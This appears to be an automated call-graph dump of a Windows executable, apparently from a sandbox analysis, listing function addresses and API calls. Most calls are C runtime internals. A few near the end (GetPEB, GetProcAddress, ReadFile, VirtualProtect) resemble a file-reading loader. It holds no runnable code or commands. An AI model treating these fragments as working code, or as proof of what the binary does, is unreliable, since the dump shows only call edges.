d79f58 16904->16929 16908 d79f2c 16906->16908 16907->16904 16910 d756b7 ___free_lconv_mon 14 API calls 16907->16910 16924 d79ed3 16907->16924 16909 d756b7 ___free_lconv_mon 14 API calls 16908->16909 16911 d79f3f 16909->16911 16914 d79ec8 16910->16914 16916 d756b7 ___free_lconv_mon 14 API calls 16911->16916 16912 d756b7 ___free_lconv_mon 14 API calls 16917 d79eff 16912->16917 16913 d79fc6 16919 d756b7 ___free_lconv_mon 14 API calls 16913->16919 16931 d792e1 16914->16931 16915 d756b7 ___free_lconv_mon 14 API calls 16921 d79eea 16915->16921 16922 d79f4d 16916->16922 16918 d756b7 ___free_lconv_mon 14 API calls 16917->16918 16918->16904 16923 d79fcc 16919->16923 16959 d795fd 16921->16959 16926 d756b7 ___free_lconv_mon 14 API calls 16922->16926 16923->16899 16924->16915 16928 d79ef5 16924->16928 16926->16929 16927 d756b7 14 API calls ___free_lconv_mon 16930 d79f66 16927->16930 16928->16912 16971 d7a024 16929->16971 16930->16913 16930->16927 16932 d792f2 16931->16932 16958 d793db 16931->16958 16933 d79303 16932->16933 16934 d756b7 ___free_lconv_mon 14 API calls 16932->16934 16935 d79315 16933->16935 16936 d756b7 ___free_lconv_mon 14 API calls 16933->16936 16934->16933 16937 d79327 16935->16937 16938 d756b7 ___free_lconv_mon 14 API calls 16935->16938 16936->16935 16939 d79339 16937->16939 16940 d756b7 ___free_lconv_mon 14 API calls 16937->16940 16938->16937 16941 d756b7 ___free_lconv_mon 14 API calls 16939->16941 16944 d7934b 16939->16944 16940->16939 16941->16944 16942 d756b7 ___free_lconv_mon 14 API calls 16943 d7935d 16942->16943 16945 d756b7 ___free_lconv_mon 14 API calls 16943->16945 16947 d7936f 16943->16947 16944->16942 16944->16943 16945->16947 16946 d79381 16949 d79393 16946->16949 16950 d756b7 ___free_lconv_mon 14 API calls 16946->16950 16947->16946 16948 d756b7 ___free_lconv_mon 14 API calls 16947->16948 16948->16946 16951 d793a5 16949->16951 16952 d756b7 ___free_lconv_mon 14 API calls 16949->16952 16950->16949 16953 d793b7 16951->16953 16954 d756b7 ___free_lconv_mon 14 API calls 16951->16954 16952->16951 16954->16953 16958->16924 16960 d79662 16959->16960 16961 d7960a 16959->16961 16960->16928 16962 d7961a 16961->16962 16963 d756b7 ___free_lconv_mon 14 API calls 16961->16963 16964 d7962c 16962->16964 16966 d756b7 ___free_lconv_mon 14 API calls 16962->16966 16963->16962 16965 d7963e 16964->16965 16967 d756b7 ___free_lconv_mon 14 API calls 16964->16967 16968 d79650 16965->16968 16969 d756b7 ___free_lconv_mon 14 API calls 16965->16969 16966->16964 16967->16965 16968->16960 16970 d756b7 ___free_lconv_mon 14 API calls 16968->16970 16969->16968 16970->16960 16972 d7a050 16971->16972 16973 d7a031 16971->16973 16972->16930 16973->16972 16974 d796eb __Getctype 14 API calls 16973->16974 16975 d7a04a 16974->16975 16976 d756b7 ___free_lconv_mon 14 API calls 16975->16976 16976->16972 16977->16902 17028 d77d63 16978->17028 16982 d77b13 ___scrt_is_nonwritable_in_current_image 16981->16982 16983 d75a9b __dosmaperr 14 API calls 16982->16983 16984 d77b63 16982->16984 16986 d77b75 std::locale::_Setgloballocale 16982->16986 16990 d77b44 std::locale::_Setgloballocale 16982->16990 16983->16990 16985 d71314 __strnicoll 14 API calls 16984->16985 16988 d77b68 16985->16988 16987 d77bab std::locale::_Setgloballocale 16986->16987 17042 d71d11 EnterCriticalSection 16986->17042 16993 d77ce5 16987->16993 16994 d77be8 16987->16994 17004 d77c16 16987->17004 17039 d719ff 16988->17039 16990->16984 16990->16986 17007 d77b4d 16990->17007 16995 d77cf0 16993->16995 17074 d71d28 LeaveCriticalSection 16993->17074 16994->17004 17043 d7594a GetLastError 16994->17043 16998 d6f18f std::locale::_Setgloballocale 21 API calls 16995->16998 16999 d77cf8 16998->16999 17001 d7594a __Getctype 48 API calls 17005 d77c6b 17001->17005 17003 d7594a __Getctype 48 API calls 17003->17004 17070 d77c91 17004->17070 17006 d7594a __Getctype 48 API calls 17005->17006 17005->17007 17006->17007 17007->16819 17009 d71a7c std::locale::_Setgloballocale std::bad_exception::bad_exception 17008->17009 17010 d71aa8 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17009->17010 17011 d71b79 std::locale::_Setgloballocale 17010->17011 17089 d671d1 17011->17089 17013 d71b97 17013->16819 17015 d74476 17014->17015 17016 d74479 GetLastError 17014->17016 17015->16819 17097 d7f5f0 17016->17097 17019 d744f3 SetLastError 17019->16819 17020 d7f62b ___vcrt_FlsSetValue 6 API calls 17021 d744a7 __Getctype 17020->17021 17022 d744cf 17021->17022 17023 d7f62b ___vcrt_FlsSetValue 6 API calls 17021->17023 17027 d744ad 17021->17027 17024 d7f62b ___vcrt_FlsSetValue 6 API calls 17022->17024 17025 d744e3 17022->17025 17023->17022 17024->17025 17102 d72a5e 17025->17102 17027->17019 17029 d77d6f ___scrt_is_nonwritable_in_current_image 17028->17029 17034 d71d11 EnterCriticalSection 17029->17034 17031 d77d7d 17035 d77dbf 17031->17035 17034->17031 17038 d71d28 LeaveCriticalSection 17035->17038 17037 d77b05 17037->16819 17038->17037 17075 d71c4e 17039->17075 17041 d71a0b 17041->17007 17042->16987 17044 d75960 17043->17044 17045 d75966 17043->17045 17046 d76374 __Getctype 6 API calls 17044->17046 17047 d763b3 __Getctype 6 API calls 17045->17047 17049 d7596a SetLastError 17045->17049 17046->17045 17048 d75982 17047->17048 17048->17049 17051 d769f4 __Getctype 14 API calls 17048->17051 17053 d759ff 17049->17053 17054 d759fa 17049->17054 17052 d75997 17051->17052 17056 d759b0 17052->17056 17057 d7599f 17052->17057 17055 d71f83 CallUnexpected 46 API calls 17053->17055 17054->17003 17058 d75a04 17055->17058 17060 d763b3 __Getctype 6 API calls 17056->17060 17059 d763b3 __Getctype 6 API calls 17057->17059 17062 d759ad 17059->17062 17061 d759bc 17060->17061 17063 d759d7 17061->17063 17064 d759c0 17061->17064 17066 d756b7 ___free_lconv_mon 14 API calls 17062->17066 17067 d75c5c __Getctype 14 API calls 17063->17067 17065 d763b3 __Getctype 6 API calls 17064->17065 17065->17062 17066->17049 17068 d759e2 17067->17068 17069 d756b7 ___free_lconv_mon 14 API calls 17068->17069 17069->17049 17071 d77c95 17070->17071 17072 d77c5d 17070->17072 17088 d71d28 LeaveCriticalSection 17071->17088 17072->17001 17072->17005 17072->17007 17074->16995 17076 d71c60 _Fputc 17075->17076 17079 d71ba8 17076->17079 17078 d71c78 _Fputc 17078->17041 17080 d71bbf 17079->17080 17081 d71bb8 17079->17081 17083 d71c25 _Fputc GetLastError SetLastError 17080->17083 17084 d71bcd 17080->17084 17082 d6d620 _Fputc 16 API calls 17081->17082 17082->17080 17085 d71bf4 17083->17085 17084->17078 17085->17084 17086 d71a2c __Getctype 11 API calls 17085->17086 17087 d71c24 17086->17087 17088->17072 17090 d671da IsProcessorFeaturePresent 17089->17090 17091 d671d9 17089->17091 17093 d695cd 17090->17093 17091->17013 17096 d696b3 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17093->17096 17095 d696b0 17095->17013 17096->17095 17098 d7f6fb ___vcrt_FlsFree 5 API calls 17097->17098 17099 d7f60a 17098->17099 17100 d7f622 TlsGetValue 17099->17100 17101 d7448e 17099->17101 17100->17101 17101->17019 17101->17020 17101->17027 17103 d756b7 ___free_lconv_mon 14 API calls 17102->17103 17104 d72a76 17103->17104 17104->17027 17138 d6c7ea 17105->17138 17108 d774e0 17110 d774f7 17108->17110 17111 d774e5 GetACP 17108->17111 17109 d774ce GetOEMCP 17109->17110 17110->16778 17112 d756f1 17110->17112 17111->17110 17113 d7572f 17112->17113 17117 d756ff __Getctype 17112->17117 17115 d71314 __strnicoll 14 API calls 17113->17115 17114 d7571a RtlAllocateHeap 17116 d7572d 17114->17116 17114->17117 17115->17116 17116->16774 17116->16775 17117->17113 17117->17114 17118 d6f4ab std::ios_base::_Init 2 API calls 17117->17118 17118->17117 17120 d774ad 50 API calls 17119->17120 17122 d772c8 17120->17122 17121 d773cd 17123 d671d1 _ValidateLocalCookies 5 API calls 17121->17123 17122->17121 17124 d77305 IsValidCodePage 17122->17124 17127 d77320 std::bad_exception::bad_exception 17122->17127 17125 d774ab 17123->17125 17124->17121 17126 d77317 17124->17126 17125->16780 17125->16785 17126->17127 17128 d77340 GetCPInfo 17126->17128 17178 d77837 17127->17178 17128->17121 17128->17127 17131 d779e8 ___scrt_is_nonwritable_in_current_image 17130->17131 17255 d71d11 EnterCriticalSection 17131->17255 17133 d779f2 17256 d77776 17133->17256 17139 d6c808 17138->17139 17145 d6c801 17138->17145 17140 d7594a __Getctype 48 API calls 17139->17140 17139->17145 17141 d6c829 17140->17141 17146 d75f2e 17141->17146 17145->17108 17145->17109 17147 d75f41 17146->17147 17148 d6c83f 17146->17148 17147->17148 17154 d7a055 17147->17154 17150 d75f5b 17148->17150 17151 d75f83 17150->17151 17152 d75f6e 17150->17152 17151->17145 17152->17151 17175 d77242 17152->17175 17155 d7a061 ___scrt_is_nonwritable_in_current_image 17154->17155 17156 d7594a __Getctype 48 API calls 17155->17156 17157 d7a06a 17156->17157 17158 d7a0b0 17157->17158 17167 d71d11 EnterCriticalSection 17157->17167 17158->17148 17160 d7a088 17168 d7a0d6 17160->17168 17165 d71f83 CallUnexpected 48 API calls 17166 d7a0d5 17165->17166 17167->17160 17169 d7a0e4 __Getctype 17168->17169 17171 d7a099 17168->17171 17170 d79e8a __Getctype 14 API calls 17169->17170 17169->17171 17170->17171 17172 d7a0b5 17171->17172 17173 d71d28 std::_Lockit::~_Lockit LeaveCriticalSection 17172->17173 17174 d7a0ac 17173->17174 17174->17158 17174->17165 17176 d7594a __Getctype 48 API calls 17175->17176 17177 d77247 17176->17177 17177->17151 17179 d7785f GetCPInfo 17178->17179 17180 d77928 17178->17180 17179->17180 17181 d77877 17179->17181 17183 d671d1 _ValidateLocalCookies 5 API calls 17180->17183 17189 d76ce0 17181->17189 17185 d779da 17183->17185 17185->17121 17188 d76de1 52 API calls 17188->17180 17190 d6c7ea __strnicoll 48 API calls 17189->17190 17191 d76d00 17190->17191 17209 d7573f 17191->17209 17193 d76dbc 17195 d671d1 _ValidateLocalCookies 5 API calls 17193->17195 17194 d76db4 17212 d69f07 17194->17212 17198 d76ddf 17195->17198 17196 d76d2d 17196->17193 17196->17194 17197 d756f1 std::_Locinfo::_Locinfo_dtor 15 API calls 17196->17197 17200 d76d52 __alloca_probe_16 std::bad_exception::bad_exception 17196->17200 17197->17200 17204 d76de1 17198->17204 17200->17194 17201 d7573f std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 17200->17201 17202 d76d9b 17201->17202 17202->17194 17203 d76da2 GetStringTypeW 17202->17203 17203->17194 17205 d6c7ea __strnicoll 48 API calls 17204->17205 17206 d76df4 17205->17206 17218 d76e2a 17206->17218 17216 d75769 17209->17216 17213 d69f11 17212->17213 17215 d69f22 17212->17215 17214 d72a5e __freea 14 API calls 17213->17214 17213->17215 17214->17215 17215->17193 17217 d7575b MultiByteToWideChar 17216->17217 17217->17196 17219 d76e45 17218->17219 17220 d7573f std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 17219->17220 17223 d76e89 17220->17223 17221 d77004 17222 d671d1 _ValidateLocalCookies 5 API calls 17221->17222 17224 d76e15 17222->17224 17223->17221 17225 d756f1 std::_Locinfo::_Locinfo_dtor 15 API calls 17223->17225 17227 d76eaf __alloca_probe_16 17223->17227 17238 d76f57 17223->17238 17224->17188 17225->17227 17226 d69f07 __freea 14 API calls 17226->17221 17228 d7573f std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 17227->17228 17227->17238 17229 d76ef8 17228->17229 17229->17238 17246 d764f3 17229->17246 17238->17226 17247 d76862 std::_Locinfo::_Locinfo_dtor 5 API calls 17246->17247 17248 d764fe 17247->17248 17249 d7658f std::_Locinfo::_Locinfo_dtor 5 API calls 17248->17249 17251 d76504 17248->17251 17251->17238 17255->17133 17266 d733bb 17256->17266 17258 d77798 17259 d733bb 29 API calls 17258->17259 17260 d777b7 17259->17260 17261 d756b7 ___free_lconv_mon 14 API calls 17260->17261 17262 d777de 17260->17262 17261->17262 17263 d77a1d 17262->17263 17280 d71d28 LeaveCriticalSection 17263->17280 17265 d77a0b 17265->16786 17267 d733cc 17266->17267 17275 d733c8 codecvt 17266->17275 17268 d733d3 17267->17268 17271 d733e6 std::bad_exception::bad_exception 17267->17271 17269 d71314 __strnicoll 14 API calls 17268->17269 17270 d733d8 17269->17270 17272 d719ff __strnicoll 29 API calls 17270->17272 17273 d73414 17271->17273 17274 d7341d 17271->17274 17271->17275 17272->17275 17276 d71314 __strnicoll 14 API calls 17273->17276 17274->17275 17278 d71314 __strnicoll 14 API calls 17274->17278 17275->17258 17277 d73419 17276->17277 17279 d719ff __strnicoll 29 API calls 17277->17279 17278->17277 17279->17275 17280->17265 17282 d75348 17281->17282 17283 d7533a 17281->17283 17284 d71314 __strnicoll 14 API calls 17282->17284 17283->17282 17285 d75360 17283->17285 17289 d75350 17284->17289 17287 d7535a 17285->17287 17288 d71314 __strnicoll 14 API calls 17285->17288 17286 d719ff __strnicoll 29 API calls 17286->17287 17287->16731 17288->17289 17289->17286 17291 d71810 17290->17291 17295 d717f3 17290->17295 17291->16736 17292 d7180a 17293 d756b7 ___free_lconv_mon 14 API calls 17292->17293 17293->17291 17294 d756b7 ___free_lconv_mon 14 API calls 17294->17295 17295->17292 17295->17294 17297 d71a38 17296->17297 17298 d71a60 std::locale::_Setgloballocale 8 API calls 17297->17298 17299 d71a4d GetCurrentProcess TerminateProcess 17298->17299 17299->16742 17301 d7ca50 17300->17301 17302 d7ca61 17301->17302 17305 d7ca74 ___from_strstr_to_strchr 17301->17305 17303 d71314 __strnicoll 14 API calls 17302->17303 17304 d7ca66 17303->17304 17304->16686 17306 d7cc8b 17305->17306 17307 d7ca94 17305->17307 17308 d71314 __strnicoll 14 API calls 17306->17308 17363 d7ccb0 17307->17363 17309 d7cc90 17308->17309 17311 d756b7 ___free_lconv_mon 14 API calls 17309->17311 17311->17304 17313 d7cada 17317 d769f4 __Getctype 14 API calls 17313->17317 17349 d7cac4 17313->17349 17315 d7cab6 17320 d7cad3 17315->17320 17321 d7cabf 17315->17321 17319 d7cae8 17317->17319 17318 d756b7 ___free_lconv_mon 14 API calls 17318->17304 17323 d756b7 ___free_lconv_mon 14 API calls 17319->17323 17325 d7ccb0 48 API calls 17320->17325 17324 d71314 __strnicoll 14 API calls 17321->17324 17322 d7cb4d 17326 d756b7 ___free_lconv_mon 14 API calls 17322->17326 17327 d7caf3 17323->17327 17324->17349 17328 d7cad8 17325->17328 17336 d7cb55 17326->17336 17327->17328 17331 d769f4 __Getctype 14 API calls 17327->17331 17327->17349 17328->17349 17367 d7ccca 17328->17367 17329 d7cb98 17330 d7c065 std::ios_base::_Init 32 API calls 17329->17330 17329->17349 17332 d7cbc6 17330->17332 17333 d7cb0f 17331->17333 17335 d756b7 ___free_lconv_mon 14 API calls 17332->17335 17338 d756b7 ___free_lconv_mon 14 API calls 17333->17338 17334 d7cc80 17339 d756b7 ___free_lconv_mon 14 API calls 17334->17339 17340 d7cb82 17335->17340 17336->17340 17371 d7c065 17336->17371 17338->17328 17339->17304 17340->17334 17343 d769f4 __Getctype 14 API calls 17340->17343 17340->17349 17341 d7cb79 17342 d756b7 ___free_lconv_mon 14 API calls 17341->17342 17342->17340 17344 d7cc11 17343->17344 17345 d7cc21 17344->17345 17346 d7cc19 17344->17346 17348 d7532c ___std_exception_copy 29 API calls 17345->17348 17347 d756b7 ___free_lconv_mon 14 API calls 17346->17347 17347->17349 17350 d7cc2d 17348->17350 17349->17318 17351 d7cca5 17350->17351 17352 d7cc34 17350->17352 17353 d71a2c __Getctype 11 API calls 17351->17353 17380 d8392c 17352->17380 17355 d7ccaf 17353->17355 17357 d7cc5b 17359 d71314 __strnicoll 14 API calls 17357->17359 17358 d7cc7a 17360 d756b7 ___free_lconv_mon 14 API calls 17358->17360 17361 d7cc60 17359->17361 17360->17334 17362 d756b7 ___free_lconv_mon 14 API calls 17361->17362 17362->17349 17364 d7ccbd 17363->17364 17365 d7ca9f 17363->17365 17395 d7cd1f 17364->17395 17365->17313 17365->17315 17365->17328 17368 d7cb3d 17367->17368 17370 d7cce0 17367->17370 17368->17322 17368->17329 17370->17368 17410 d8383b 17370->17410 17372 d7c072 17371->17372 17373 d7c08d 17371->17373 17372->17373 17374 d7c07e 17372->17374 17375 d7c09c 17373->17375 17444 d827c4 17373->17444 17376 d71314 __strnicoll 14 API calls 17374->17376 17451 d7f005 17375->17451 17379 d7c083 std::bad_exception::bad_exception 17376->17379 17379->17341 17463 d769b5 17380->17463 17385 d8399f 17387 d756b7 ___free_lconv_mon 14 API calls 17385->17387 17389 d839ab 17385->17389 17386 d769b5 48 API calls 17390 d8397c 17386->17390 17387->17389 17388 d7cc55 17388->17357 17388->17358 17389->17388 17392 d756b7 ___free_lconv_mon 14 API calls 17389->17392 17391 d6c8e4 17 API calls 17390->17391 17393 d83989 17391->17393 17392->17388 17393->17385 17394 d83993 SetEnvironmentVariableW 17393->17394 17394->17385 17396 d7cd32 17395->17396 17397 d7cd2d 17395->17397 17398 d769f4 __Getctype 14 API calls 17396->17398 17397->17365 17407 d7cd4f 17398->17407 17399 d7cdbd 17401 d71f83 CallUnexpected 48 API calls 17399->17401 17400 d7cdac 17402 d756b7 ___free_lconv_mon 14 API calls 17400->17402 17403 d7cdc2 17401->17403 17402->17397 17404 d71a2c __Getctype 11 API calls 17403->17404 17405 d7cdce 17404->17405 17406 d769f4 __Getctype 14 API calls 17406->17407 17407->17399 17407->17400 17407->17403 17407->17406 17408 d756b7 ___free_lconv_mon 14 API calls 17407->17408 17409 d7532c ___std_exception_copy 29 API calls 17407->17409 17408->17407 17409->17407 17411 d83849 17410->17411 17412 d8384f 17410->17412 17413 d840ab 17411->17413 17414 d84063 17411->17414 17412->17370 17426 d840c1 17413->17426 17415 d84069 17414->17415 17418 d84086 17414->17418 17417 d71314 __strnicoll 14 API calls 17415->17417 17420 d8406e 17417->17420 17422 d71314 __strnicoll 14 API calls 17418->17422 17425 d840a4 17418->17425 17419 d84079 17419->17370 17421 d719ff __strnicoll 29 API calls 17420->17421 17421->17419 17423 d84095 17422->17423 17424 d719ff __strnicoll 29 API calls 17423->17424 17424->17419 17425->17370 17427 d840eb 17426->17427 17428 d840d1 17426->17428 17430 d8410a 17427->17430 17431 d840f3 17427->17431 17429 d71314 __strnicoll 14 API calls 17428->17429 17432 d840d6 17429->17432 17434 d8412d 17430->17434 17435 d84116 17430->17435 17433 d71314 __strnicoll 14 API calls 17431->17433 17436 d719ff __strnicoll 29 API calls 17432->17436 17437 d840f8 17433->17437 17439 d6c7ea __strnicoll 48 API calls 17434->17439 17442 d840e1 17434->17442 17438 d71314 __strnicoll 14 API calls 17435->17438 17436->17442 17440 d719ff __strnicoll 29 API calls 17437->17440 17441 d8411b 17438->17441 17439->17442 17440->17442 17443 d719ff __strnicoll 29 API calls 17441->17443 17442->17419 17443->17442 17445 d827cf 17444->17445 17446 d827e4 HeapSize 17444->17446 17447 d71314 __strnicoll 14 API calls 17445->17447 17446->17375 17448 d827d4 17447->17448 17449 d719ff __strnicoll 29 API calls 17448->17449 17450 d827df 17449->17450 17450->17375 17452 d7f012 17451->17452 17453 d7f01d 17451->17453 17454 d756f1 std::_Locinfo::_Locinfo_dtor 15 API calls 17452->17454 17455 d7f025 17453->17455 17461 d7f02e __Getctype 17453->17461 17460 d7f01a 17454->17460 17458 d756b7 ___free_lconv_mon 14 API calls 17455->17458 17456 d7f033 17459 d71314 __strnicoll 14 API calls 17456->17459 17457 d7f058 HeapReAlloc 17457->17460 17457->17461 17458->17460 17459->17460 17460->17379 17461->17456 17461->17457 17462 d6f4ab std::ios_base::_Init 2 API calls 17461->17462 17462->17461 17464 d6c7ea __strnicoll 48 API calls 17463->17464 17465 d769c7 17464->17465 17466 d769d9 17465->17466 17471 d76226 17465->17471 17468 d6c8e4 17466->17468 17477 d6c93c 17468->17477 17474 d76792 17471->17474 17475 d7670d std::_Locinfo::_Locinfo_dtor 5 API calls 17474->17475 17476 d7622e 17475->17476 17476->17466 17478 d6c964 17477->17478 17479 d6c94a 17477->17479 17481 d6c98a 17478->17481 17482 d6c96b 17478->17482 17495 d6c8ca 17479->17495 17483 d7573f std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 17481->17483 17487 d6c8fc 17482->17487 17499 d6c88b 17482->17499 17484 d6c999 17483->17484 17486 d6c9a0 GetLastError 17484->17486 17489 d6c9c6 17484->17489 17491 d6c88b 15 API calls 17484->17491 17504 d7133a 17486->17504 17487->17385 17487->17386 17489->17487 17492 d7573f std::_Locinfo::_Locinfo_dtor MultiByteToWideChar 17489->17492 17491->17489 17494 d6c9dd 17492->17494 17493 d71314 __strnicoll 14 API calls 17493->17487 17494->17486 17494->17487 17496 d6c8d5 17495->17496 17497 d6c8dd 17495->17497 17498 d756b7 ___free_lconv_mon 14 API calls 17496->17498 17497->17487 17498->17497 17500 d6c8ca 14 API calls 17499->17500 17501 d6c899 17500->17501 17509 d6c86c 17501->17509 17512 d71327 17504->17512 17506 d71345 __dosmaperr 17507 d71314 __strnicoll 14 API calls 17506->17507 17508 d6c9ac 17507->17508 17508->17493 17510 d756f1 std::_Locinfo::_Locinfo_dtor 15 API calls 17509->17510 17511 d6c879 17510->17511 17511->17487 17513 d75a9b __dosmaperr 14 API calls 17512->17513 17514 d7132c 17513->17514 17514->17506 17518 d62010 GetModuleHandleA GetModuleFileNameW 17515->17518 17525 d7401a 17518->17525 17520 d62081 17529 d61f00 17520->17529 17523 d671d1 _ValidateLocalCookies 5 API calls 17524 d62099 17523->17524 17524->16545 17526 d7402d _Fputc 17525->17526 17538 d7408f 17526->17538 17528 d7403f _Fputc 17528->17520 17580 d61ba0 GetPEB 17529->17580 17531 d61f1f 17581 d61c10 GetProcAddress 17531->17581 17533 d61f39 17534 d671d1 _ValidateLocalCookies 5 API calls 17533->17534 17536 d61ffb 17534->17536 17536->17523 17537 d61f31 17537->17533 17594 d61db0 17537->17594 17539 d740bf 17538->17539 17540 d740ce 17539->17540 17541 d740ec 17539->17541 17552 d740c3 17539->17552 17542 d71ba8 _Fputc 29 API calls 17540->17542 17543 d740f9 17541->17543 17562 d6d5c0 17541->17562 17542->17552 17546 d74113 17543->17546 17547 d74131 17543->17547 17544 d671d1 _ValidateLocalCookies 5 API calls 17551 d74334 17544->17551 17568 d7f46b 17546->17568 17549 d74145 17547->17549 17550 d742c1 17547->17550 17549->17552 17554 d741df 17549->17554 17558 d74189 17549->17558 17550->17552 17553 d75801 _Fputc WideCharToMultiByte 17550->17553 17551->17528 17552->17544 17553->17552 17555 d75801 _Fputc WideCharToMultiByte 17554->17555 17557 d741f2 17555->17557 17556 d75801 _Fputc WideCharToMultiByte 17556->17552 17557->17552 17559 d7420b GetLastError 17557->17559 17558->17556 17559->17552 17560 d7421a 17559->17560 17560->17552 17561 d75801 _Fputc WideCharToMultiByte 17560->17561 17561->17560 17563 d6d5d0 17562->17563 17572 d75f88 17563->17572 17569 d7f4a2 std::_Locinfo::_Locinfo_dtor codecvt 17568->17569 17570 d671d1 _ValidateLocalCookies 5 API calls 17569->17570 17571 d7f578 17570->17571 17571->17552 17573 d6d5ed 17572->17573 17574 d75f9f 17572->17574 17576 d75fb9 17573->17576 17574->17573 17575 d7a055 __Getctype 48 API calls 17574->17575 17575->17573 17577 d6d5fa 17576->17577 17578 d75fd0 17576->17578 17577->17543 17578->17577 17579 d77242 __strnicoll 48 API calls 17578->17579 17579->17577 17580->17531 17582 d61c59 CreateFileA 17581->17582 17583 d61cb3 GetFileSize 17582->17583 17584 d61caa 17582->17584 17585 d61cf1 17583->17585 17586 d61cd9 CloseHandle 17583->17586 17587 d671d1 _ValidateLocalCookies 5 API calls 17584->17587 17588 d61cfc ReadFile 17585->17588 17586->17584 17589 d61d98 17587->17589 17590 d61d70 CloseHandle 17588->17590 17591 d61d3c 17588->17591 17589->17537 17590->17584 17592 d61d4d 17591->17592 17593 d61d58 CloseHandle 17591->17593 17592->17593 17593->17584 17606 d61000 17594->17606 17597 d61000 114 API calls 17598 d61e5b GetProcAddress 17597->17598 17599 d61e84 VirtualProtect 17598->17599 17601 d61ed1 17599->17601 17602 d61edc 17599->17602 17617 d61bd0 17601->17617 17603 d671d1 _ValidateLocalCookies 5 API calls 17602->17603 17605 d61eeb 17603->17605 17605->17533 17607 d61056 17606->17607 17621 d61440 17607->17621 17609 d613c7 17650 d61b80 17609->17650 17614 d61167 ___std_exception_copy 17614->17609 17616 d72a5e __freea 14 API calls 17614->17616 17625 d61490 17614->17625 17628 d614c0 17614->17628 17644 d61af0 17614->17644 17616->17614 17618 d61bfa 17617->17618 17619 d671d1 _ValidateLocalCookies 5 API calls 17618->17619 17620 d61c04 17619->17620 17620->17602 17622 d61466 std::ios_base::_Init 17621->17622 17623 d671d1 _ValidateLocalCookies 5 API calls 17622->17623 17624 d61487 17623->17624 17624->17614 17653 d62410 17625->17653 17627 d614aa 17627->17614 17630 d61510 _strlen 17628->17630 17700 d63090 17630->17700 17631 d615b1 17637 d615c4 17631->17637 17704 d631c0 17631->17704 17636 d618ef 17636->17614 17726 d635f0 17637->17726 17638 d63470 79 API calls 17642 d61601 std::ios_base::_Ios_base_dtor 17638->17642 17640 d61712 17640->17637 17641 d616bc 17641->17640 17721 d63470 17641->17721 17642->17638 17642->17641 17645 d61b20 _Fputc 17644->17645 17896 d62130 17645->17896 17648 d671d1 _ValidateLocalCookies 5 API calls 17649 d61b4e 17648->17649 17649->17614 17915 d62230 17650->17915 17654 d62458 17653->17654 17656 d6243f 17653->17656 17657 d624f0 17654->17657 17656->17627 17658 d62533 std::ios_base::_Init 17657->17658 17676 d627a0 17658->17676 17661 d6258a 17680 d62820 17661->17680 17666 d625b9 std::ios_base::_Init 17667 d62653 17666->17667 17668 d62620 17666->17668 17670 d628f0 5 API calls 17667->17670 17694 d628f0 17668->17694 17672 d6267a 17670->17672 17671 d62649 17673 d628f0 5 API calls 17672->17673 17673->17671 17677 d627bb std::ios_base::_Init 17676->17677 17678 d671d1 _ValidateLocalCookies 5 API calls 17677->17678 17679 d62578 17678->17679 17679->17661 17691 d62800 17679->17691 17681 d62837 17680->17681 17682 d627a0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17681->17682 17683 d625a1 17682->17683 17684 d628a0 17683->17684 17685 d62af0 30 API calls 17684->17685 17686 d628ba 17685->17686 17686->17666 17692 d67974 std::ios_base::_Init 30 API calls 17691->17692 17693 d62812 17692->17693 17695 d62917 std::ios_base::_Init 17694->17695 17696 d62fd0 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 17695->17696 17697 d62949 17696->17697 17702 d630d9 17700->17702 17701 d630f1 17701->17631 17702->17701 17734 d63720 17702->17734 17742 d674e4 17704->17742 17708 d63217 17709 d63255 17708->17709 17763 d63ac0 17708->17763 17756 d67515 17709->17756 17712 d6331a 17712->17642 17714 d6328b 17777 d63c20 17714->17777 17727 d63615 17726->17727 17877 d64de0 17727->17877 17730 d63640 17731 d63654 17730->17731 17732 d6366f 17731->17732 17892 d66940 17731->17892 17732->17636 17735 d63762 17734->17735 17736 d63815 17735->17736 17737 d63090 39 API calls 17735->17737 17736->17701 17739 d6377d 17737->17739 17738 d63640 39 API calls 17738->17736 17740 d635f0 39 API calls 17739->17740 17741 d63790 17739->17741 17740->17741 17741->17738 17743 d674f3 17742->17743 17744 d674fa 17742->17744 17790 d71d3f 17743->17790 17746 d63202 17744->17746 17795 d69c58 EnterCriticalSection 17744->17795 17748 d63990 17746->17748 17749 d639b2 17748->17749 17750 d639ee 17748->17750 17751 d674e4 std::_Lockit::_Lockit 7 API calls 17749->17751 17752 d671d1 _ValidateLocalCookies 5 API calls 17750->17752 17753 d639c3 17751->17753 17754 d63a00 17752->17754 17755 d67515 std::_Lockit::~_Lockit 2 API calls 17753->17755 17754->17708 17755->17750 17757 d6751f 17756->17757 17758 d71d4d 17756->17758 17759 d67532 17757->17759 17796 d69c66 LeaveCriticalSection 17757->17796 17797 d71d28 LeaveCriticalSection 17758->17797 17759->17712 17762 d71d54 17762->17712 17764 d63272 17763->17764 17765 d63aff 17763->17765 17764->17714 17773 d63bf0 17764->17773 17765->17764 17798 d67153 17765->17798 17767 d63b18 17809 d63d50 17767->17809 17774 d63c08 17773->17774 17841 d6a45c 17774->17841 17776 d63c1d 17778 d63c50 17777->17778 17779 d671d1 _ValidateLocalCookies 5 API calls 17778->17779 17780 d632a5 17779->17780 17791 d7660b std::_Locinfo::_Locinfo_dtor 5 API calls 17790->17791 17792 d71d44 17791->17792 17793 d71d11 std::_Lockit::_Lockit EnterCriticalSection 17792->17793 17794 d71d4b 17793->17794 17794->17746 17795->17746 17796->17759 17797->17762 17800 d67158 ___std_exception_copy 17798->17800 17799 d67172 17799->17767 17800->17799 17801 d6f4ab std::ios_base::_Init EnterCriticalSection LeaveCriticalSection 17800->17801 17802 d67174 17800->17802 17801->17800 17803 d694be std::ios_base::_Init 17802->17803 17805 d6717e Concurrency::cancel_current_task 17802->17805 17804 d6a45c Concurrency::cancel_current_task RaiseException 17803->17804 17806 d694da 17804->17806 17807 d6a45c Concurrency::cancel_current_task RaiseException 17805->17807 17842 d6a476 17841->17842 17843 d6a4a4 RaiseException 17841->17843 17842->17843 17843->17776 17880 d64e30 17877->17880 17881 d64e74 17880->17881 17882 d64f1c 17880->17882 17885 d6a45c 